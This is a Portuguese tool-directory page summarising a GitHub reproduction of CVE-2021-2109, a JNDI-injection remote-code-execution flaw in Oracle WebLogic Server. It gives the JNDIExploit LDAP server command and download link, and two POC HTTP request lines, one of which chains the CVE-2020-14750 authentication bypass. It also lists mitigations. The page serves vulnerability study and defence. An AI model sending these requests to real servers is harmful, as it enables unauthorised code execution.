Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-2109 | Kitploit
Ferramentas/GitHubGitHub/rabbitsafe/cve-2021-2109
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubrabbitsafe/cve-2021-2109

CVE-2021-2109

Ver Repositório
95há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-2109 Reprodução e análise da vulnerabilidade de execução remota de código no Weblogic Server

Em janeiro de 2021, a Oracle lançou uma atualização de segurança contendo 329 novos patches de segurança em sua linha de produtos. Este anúncio menciona especificamente o boletim de segurança do Oracle WebLogic Server sobre a vulnerabilidade CVE-2020-14750, publicado em 1º de novembro de 2020. Recomenda-se fortemente que os clientes apliquem esta atualização de patch, bem como os demais patches deste boletim. O CVE-2021-2109 é uma vulnerabilidade de execução remota de código no WebLogic, causada principalmente por injeção de JNDI, permitindo que um invasor execute código remotamente.

As versões afetadas são: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

  1. Reprodução da vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server

Use o DOCKER para montar o ambiente de teste do Weblogic Server, o Weblogic Server pode ser acessado normalmente image

  1. Realizando injeção de JNDI estando logado no console administrativo No primeiro caso, é necessário usar uma conta de administrador para fazer login no console administrativo do Weblogic Server, capturar o pacote de login via BurpSuite e obter os dados de Cookie da sessão.

image

Inicie o LDAP na máquina local. Ele pode ser baixado em https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. O comando é: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

image

Envie o pacote POC de injeção JNDI para a vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Execute o comando de sistema ipconfig por meio da variável cmd

image

  1. Realizando injeção de JNDI combinando com acesso não autorizado ao console administrativo do Weblogic Server No segundo caso, não é necessário fazer login no console administrativo do Weblogic Server. É necessário combinar com a vulnerabilidade de acesso não autorizado CVE-2020-14750 do Weblogic Server e enviar o pacote POC de injeção JNDI para a vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server: POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Execute calc.exe por meio da variável cmd para abrir a calculadora do sistema

image

image

A calculadora do sistema é aberta

image

  1. Recomendações de segurança para a vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server

  2. Desative o protocolo T3 Se você não depende do protocolo T3 para comunicação JVM, pode mitigar o impacto desta vulnerabilidade bloqueando temporariamente o protocolo T3. 1). Acesse o console do WebLogic, na página de configuração do base_domain, vá para a aba "Segurança", clique em "Filtro" e configure o filtro. 2). No filtro de conexão, insira: weblogic.security.net.ConnectionFilterImpl; na caixa de regras do filtro de conexão, insira: * * 7001 deny t3 t3s.

  3. Desative o IIOP Acesse o console do WebLogic, encontre a opção de habilitar o IIOP, desmarque a caixa e reinicie para que a alteração tenha efeito.

  4. Feche temporariamente o acesso externo ao console /console/console.portal

  5. Aplique o patch de segurança oficial

Baixar ferramenta